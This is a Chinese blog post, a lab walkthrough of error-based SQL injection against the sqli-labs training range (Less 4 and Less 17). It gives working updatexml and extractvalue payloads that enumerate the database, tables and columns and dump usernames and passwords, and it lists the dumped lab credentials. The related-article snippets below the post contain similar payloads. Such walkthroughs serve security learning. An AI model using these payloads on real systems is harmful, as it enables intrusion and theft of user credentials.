Error-based基于报错注入

于 2024-08-28 20:01:44 发布
阅读量864 收藏 5
点赞数 13
文章标签: oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73049307/article/details/141648698
版权

报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法。攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容。这种攻击方法依赖于数据库将详细的错误消息返回给客户端,测试时可以发现网页会回显sql相关的报错信息。

以sqli-labs靶场的less 4和less 17为例:

/?id=1正常回显

/?id=1"正常回显

/?id=1"发现错误回显

说明是双引号闭合字符型回显,而且显示出数据库的报错信息,适合使用报错注入

判断报错条件:

?id=1") and updatexml(1,0x7e,3) -- a

(这里的-- a是为了注释掉后面的内容,注意a的前面还有个空格)

页面正常显示报错信息,确定报错函数可以使用

获取数据库名:

?id=1") and updatexml(1,concat('~',database(),'~'),1) -- a

爆出数据库名是security

获取数据库security的表名:

?id=1") and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),'~'),1) -- a

爆出emails,referers,uagents,users表名

获取users表的列名:

?id=1") and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),'~'),1) -- a

爆出id,username,password列

获取users表中各用户的信息:

?id=1") and updatexml(1,concat('~',(select concat(id,':',username,':',password) from users limit 0,1),'~'),1) -- a

后面只需要不断的修改?id=1") and updatexml(1,concat('~',(select concat(id,':',username,':',password) from users limit 0,1),'~'),1) -- a中的标记数字就可以了

接下来就轮到less 17了:

输入admin和1或者admin和1"都正常回显:

注意到url发生变化

?update="UPDATE users SET password = '$passwd' WHERE username='$row1'";

判断用户名是否存在,存在的话就重置$passwd的值,也能看出是单引号闭合字符型,但还是输入admin和1'来验证一下:

正常报错回显,说明可以用报错注入,注入点在passwd处

获取数据库名:

用burp抓包:(admin和admin)

admin' and updatexml(1,concat('~',database(),'~'),1) -- a

admin' and updatexml(1,concat('~',database(),'~'),1) #

admin' and extractvalue(1,concat('~',database(),'~')) #

admin' and extractvalue(1,concat('~',database(),'~')) --a

上面四个任选一个都行,就选第三个吧,但后面实验不知道为什么#失败了

爆出数据库名是security

获取security数据库的表名:

admin' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),'~')) #

爆出emails,referers,uagents,users表

获取users表的列名:

admin' and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),'~')) #

爆出id,username,password列

获取users表中各用户的信息:

(注意:这里不知道为什么只能输入第一、四句,第二、三句不行)

第一句:(只能一个个求id和username和password了)

admin' and extractvalue(1,concat('~',(select * from (select id from users limit 1,1) as a),'~')) #

第二句:

admin' and extractvalue(1,concat('~',(select concat(id,':',username,':',password) from users limit 0,1),'~')) #

第三句:

admin' and updatexml(1,concat('~',(select concat(id,':',username,':',password) from users limit 0,1),'~'),1) #

第四句:

admin' and updatexml(1,concat('~',(select * from (select id from users limit 1,1) as a),'~'),1) #

后续爆破出来的结果如下:

1:Dumb:Dumb

2:Angelina:I-kill-you

3:Dummy:p@ssword

4:secure:crappy

5:stupid:stupidity

6:superman:genious

7:batman:mob!le

8:admin:admin

9:admin1:admin1

10:admin2:admin2

11:admin3:admin3

12:dhakkan:dumbo

14:admin4:admin4

南暮思鸢
关注
SQL报错注入
qq_64332865的博客
02-18 616
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
基于报错型的注入
weixin_30386713的博客
07-19 187
一、floor() 、rand()、和 group by 组合: select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x 通过floor报错的方法来爆数据的本质是group by语句的报错。group by语句报错的原因是floor(random(...
SQL注入-基于报错的注入
xdjxi的博客
02-18 583
实验目的 熟悉报错功能函数extractvalue()的用法,掌握基于报错的SQL注入基本流程 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-1为入口,借助extractvalue()函数,利用基于报错的注入方式获取SQLi-Labs网站用户名和密码 1 访问SQLi-Labs网站 http://(靶机ip)/sql/Less-1/?id=1 2 寻找注入点 使用3条payload寻找注入点及判断注入点的类型 http://靶机ip/sql/Less-1/?id=1'运..
SQL注入之基于报错的注入
weixin_68951704的博客
07-05 1055
目录1.GET单引号字符型2.GET数字型3.GET单引号加括号字符型4.GET双引号字符型5.注入利用5.1利用order by判断字段5.2利用联合查询查找信息首先我们打开搭建好的sqli-labs靶场,选择less-1 进入后我们看到这样一行提示 请输入一个id值作为对应参数,这里我输入1作为参数,验证后1-14均可以回显 输入后login name 和password都显现出来我们输入单引号这里显示错误,我们将错误回显记录下来 由此我们可以猜解出SQL语句为select login_name,
SQL渗透与防御——(四)基于报错注入
FisrtBqy的博客
03-06 496
第四章 基于报错注入 1.User-Agent注入 修改消息头的User-Agent参数 单引号报错判断 推测语句 其源码有可能是insert into tablename value(1,2) 那么就要闭合value()中的右括号a',(select database())) # [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 2.Stacked queries堆叠注入 #可以执行多条SQL语句 select * from user;select * from u
sqli-lab教程——Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)
luosaierdadi的博客
07-09 250
模拟真实环境,我们作为Dump用户使用Dump密码登陆,可以看到以下 登陆成功此时打开hackbar选中post可以看到,已经自动载入的刚才提交的表单数据: 我刚测试了一下,hackbar提交uname=admin' and 1=2 --+&passwd=admin&submit=Submit作为post参数时,无论and后面是1=1还是1=2,都能登陆,不知道为什么,可能是提交的时候自动加了+号连接语句的问题。所以现在改用burpsuit,抓包修改参数。 输入admin admin 登陆,抓包,发送到re
sqli-lab教程——Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)
luosaierdadi的博客
06-28 419
输入单引号,页面报错,如下图所示根据报错信息,可以确定输入参数的内容被存放到一对单引号中间,猜想:咱们输入的1在数据库中出现的位置为:select ... from ... where id=’1’ ......,也可以查看sqli-lab中less-1的php文件可以看到,和猜想一致,多余的步骤不多说了,直接开始爆数据吧。注意 id=非正确值爆库payload?id=-1' union select 1,2,database() --+得到‘security’库名爆表payload?id=-1' unio
GET-ERROR based-Single quotes – String (GET型基于错误的单引号字符型注入) Less-1
water0diamond的博客
03-12 930
关于数据库的一些基础,会在前一篇提前准备篇中提到 首先打开网站首页,会发现如下界面:显示请输入id作为带数值的参数,那么下一步,我们就可以将参数传入试着提交然后看会有什么返回值。 使用get方式提交id参数,这样我们就可以得到返回值。可以看得到首页给出了用户名和密码。 然后再测id类型是否为字符串,用单引号测试,出现‘’’说明id为字符串类型 那么下面我们试着添加...
mysql注入中基于报错注入的多种方式
最新发布
09-21
MySQL注入中的基于报错注入Error-based Injection)是一种利用SQL注入漏洞获取额外信息而非直接获取数据库数据的技术。它通过构造特定的输入,让服务器返回错误信息,从而推断出数据库结构、表名、列名等敏感信息...
22-1.1 SQL注入的类型之GET基于报错的SQL注入回显分析
weixin_43263566的博客
01-22 139
这个实验环境来学习基于报错的SQL注入。按照实验指导,在URL中修改ID参数值,并观察页面的回显情况。尝试上述探测方法,同时学习如何使用工具(如SQLmap)来辅助注入攻击。我们可以通过修改URL中的ID参数值来探测是否存在注入漏洞。
深层error-base的sql注入攻击
09-05
error-base的sql注入,一片外国文档
基于报错的sql注入
qq_44111753的博客
11-21 311
MYSQL中默认有个information schema数据库,用来存储数据库元信息。其中具有表schemata(数据库名)、tables(表名)、 columns(列名或字段名)。 schemata:schema_ name字段用来存储数据库名。 tables:table_ schema和table_ name分别用来存储数据库名和表名。 columns:table_schema(数据库名)、table_name(表名)、column name(字段名) 1、发现SQL注入 根据报错信息'1'' LIM
基于报错的手工注入
qq_23066945的博客
10-27 503
基于报错的手工注入 实验环境:sqlli 1.首先提示,请输入ID作为参数和数值 2.构建id参数后,返回正常 3.输入转义符 \ ,得到报错信息 “1”) LIMIT 0,1 (图片上引号内的为报错信息,所以这里去掉两个引号) 由此,我们可以得到大概的SQL语句为 select * from users where id=("1") limit 0,1 尝试闭合单引号,并注释之后的...
Error-based
weixin_33882443的博客
07-13 383
1.将聚合函数count()和group by语句联合起来迫使sql查询语句返回错误(主键重复)   须知:     floor:函数只返回整数部分,小数部分舍弃。     round:函数四舍五入,大于0.5的部分进位,不到则舍弃。     floor(rand(0)*2)前面产生的随机数是确定的011011...     1>mysql在遇到select count(*) f...
基于报错的注入模式
WYJ____的博客
07-26 608
updatexml函数   基于报错的注入一般bu'z步骤 1.求闭合字符;2.爆数据库名;3.爆表名;4.爆列名;5.爆字段名。     求库名 ?id=1’ and updatexml(1,concat(0x23,database()),1)%23 求表名 ?id=1' and updatexml(1,concat(0x23,(select group_concat(ta...
SQL注入——基于报错的注入(五)
Gjqhs的博客
02-18 1125
本章目的 普及报错功能函数extractvalue()的用法,演示基于报错的SQL注入基本流程。 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 (2)安装的应用软件:Sqlmap、Burpsuite、FireFox浏览器及其插件Hackbar、等 (3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890 想机:A-SQLi-Labs (1)操作系统:Centos7 (2)安装的应用软件:Apache、MySQL(MariaDB)、PHP:DV
Sql注入-报错注入
WolvenSec的博客
06-06 1324
报错注入Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
浅谈基于报错的手工注入
dzqxwzoe的博客
03-19 366
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。最后网站开发知识多少也要了解点,不过别紧张,只是学习基础知识。
ERROR: Could not build wheels for labelme, which is required to install pyproject.toml-based projects 报错怎么解决?
09-14
这个报错是由于安装labelme时无法构建所需的wheels文件引起的。出现此问题的常见原因可能是缺少一些必要的构建依赖项。 解决方法如下: 1. 确保你的操作系统和Python环境已经安装了构建所需的工具和依赖项。具体...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值